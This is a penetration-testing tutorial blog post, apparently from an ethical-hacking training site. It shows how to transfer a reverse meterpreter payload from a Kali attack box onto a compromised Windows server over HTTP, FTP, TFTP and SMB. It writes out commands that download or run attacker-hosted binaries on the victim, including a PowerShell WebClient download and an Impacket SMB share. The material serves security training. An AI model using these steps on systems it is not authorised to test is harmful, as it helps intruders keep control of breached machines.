linux

Sometimes we need to copy a payload or a tool from a Kali Linux attack box, an advanced Linux distribution used for penetration testing, into a compromised windows machine. But how could this be done? In order to elaborate on this idea, I will first start with an example in this regard.

A ColdFusion Server was found vulnerable, and a ColdFusion Markup (CFM) web shell payload was to be applied. Imagine you are able to hide or veil this payload, yet since you are using a Kali Linux attack box, you are really in need of a way to transfer a reverse meterpreter binary, for the sake of further control and access, from the Linux machine to the Windows Server running ColdFusion. How could this be possible?

I decided to write this article to make it easy for anyone facing the same issue. In the following lines, I will walk through 4 main methods to be utilized to transfer such files: Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Trivial File Transfer Protocol (TFTP), and Server Message Block (SMB). Assume that for all the following methods, the copied files are called met8888.exe, and its location is:  /root/shells and “jarrieta” is the username used

HTTP

There are in fact two ways to manipulate using HTTP. It is either you have access to the desktop, and hence you will be able to download the files if you can open the browser, or you do not have access to the desktop and then you will use the command line. Two steps are to be followed in this process:

  1. Start the server:

The first step we need to make the files inside the current directory to become available and accessible over HTTP. To serve a file from Kali over HTTP, we can use Apache, which is fundamentally installed in Kali by default, or we can use a Python HTTP Server.

  • Using Apache:
    • Copy the file to /var/www/html
    • Make the Apache Service get enabledKali Linux
  • Using Python HTTP Server:
    • Type the following line of code inside the shell in order to open the Python web server directly in it:

python -m SimpleHTTPServer

  • Choose the port number; if you skip this stem, it will serve on port 8000 by default.Kali Linux

Press CTRL-C to kill the server when this step gets finished.

  1. Download the Files:

  • First Option: Desktop is accessible:
    • Visit the following link through the browser:Kali Linux

http://YOUR-KALI-IP/shell8888.exe ; i.e:

http://10.9.122.8/shell8888.exe

  • Download the files through the browser
  • Second Option: You cannot access Desktop (Using command Line):
    • Open the ordinary “Command Prompt”
    • Type the following command which utilizes the PowerShell’s WebClient object (:

(new-object System.Net.WebClient).DownloadFile(‘http://10.9.122.8/met8888.exe’,’C:\Users\jarrieta\Desktop\met888.exe’)

Kali Linux

FTP

This is considered another good method to go for since there is a built in FTP client inside Windows: C:\Windows\System32\ftp.exe

This method supports mutual file transfer; in other words, it allows its user to transfer files from Kali to Windows and vice versa. This aspect is not supported through HTTP. Two steps are to be followed in this process:

  1. Start the server:

In fact, there are three options to choose from when serving files through FTP:

  • First option: install vsftpd inside Kali, which will work as a full-featured FTP. You will have it still installed even after you transfer the files unless you uninstall it later on.
  • Second option: Using Python FTP server
    • Type the following command into the shell to install the FTP module:

apt-get install python-pyftpdlib

  • Now type:

python -m pyftpdlib

  • Choose the port number; if you skip this stem, it will serve on port 2121 by default.
  • Add the -w flag to allow the write access to an anonymous user.kali linux
  • Third Option: Using Metasploit: For more details on Metasploit, kindly refer to the article titled “What is Metasploit?
    • Go to the location:

auxiliary/server/ftp

  • Choose FTP to the directory inside which resides the files to be shared using the following line:

FTPROOT /root/shells

  • Run exploit
  • Type jobs -k <id>when you need to kill the serverKali Linux
  1. Download the Files:

This step is pretty straightforward since there is a built in FTP client inside Windows. We do it in the following steps:

  • Open the FTP prompt
  • Open an FTP connection:

ftp 10.9.122.8

  • Enter the user name “anonymous” and type any password for authentication stage
  • Download the files directly through the following commandsKali Linux
  • You can alternatively create a text file and name it “ftp_commands.txt” for example and include all the required answers inside it as text:
  • Kali Linux
  • Two line commands for doing all the aforementioned steps would be in this case to download the file:

ftp 10.9.122.8

-s:ftp_commands.txt

Kali Linux

Kali Linux

  • In order to get this file, there are two methods to select one of them. Both methods are illustrated in the following two pictures.

TFTP

New versions of Windows do not have tftp client installed, therefore it is required to enable it first using the following command:

pkgmgr /iu:”TFTP”

Once it gets installed or if it is already installed: it takes also two steps for the process.

  1. Start the server:

There are two options:

  • Using Kali: service atftpd start

Although it is simple, it takes a lot of time.

  • Using Metasploit:
    • Go to location:

auxiliary/server/tftp

  • Choose TFTP to the directory inside which resides the files to be shared using the following line:

TFTPROOT /root/shells

Kali Linux

  • Run exploit
  1. Download the Files:

  • Open the command prompt
  • Use the -i flag and then GET action:Kali Linux
  • Use the PUT action to extract filesKali Linux
  • Files will be saved by default in/tmp

SMB

This method is convenient since SMB is built into Windows, and no special commands are needed for the computer to understand Unified Naming Convention (UNC) paths. This way, you can use only one command to download and execute a payload. Two steps are required for the process:

  1. Start the server:

One way to do this is to install the Samba File server on Linux, which will take a lot of time which we are not really in need of. However, the simple method is using Python through the following steps:

  • Enter pywhich is a part of a project called Impacket
  • Specify a share name and the path you want to share:
  • For example, we can use the following command:

python smbserver.py ROPNOP /root/shells

Kali Linux

  • By default, the server will be up on port 445 and then any hashed challenge responses for any system connecting to the server will be printed out on the screen.
  • To confirm the past step in Linux we use smbclient, and in windows, we use the net view. The following two images illustrate this point.Kali Linux

Kali Linux

  1. Copy/ Execute the Files:

  • Open the command prompt
  • Treat the shared name ROPNOP as a local folder, and it is allowed to use commands like commands like dir, copy, move.Kali Linux
  • Use the command copyKali Linux
  • We could skip the last two steps, and just run the file inside the shared “local folder.”

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Reference:

http://hackingandsecurity.blogspot.com.eg/2016/08/transferring-files-from-linux-to.html

Finally, take some time and look at my other article on Bypassing a Windows AppLocker.

[ihc-select-level]

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.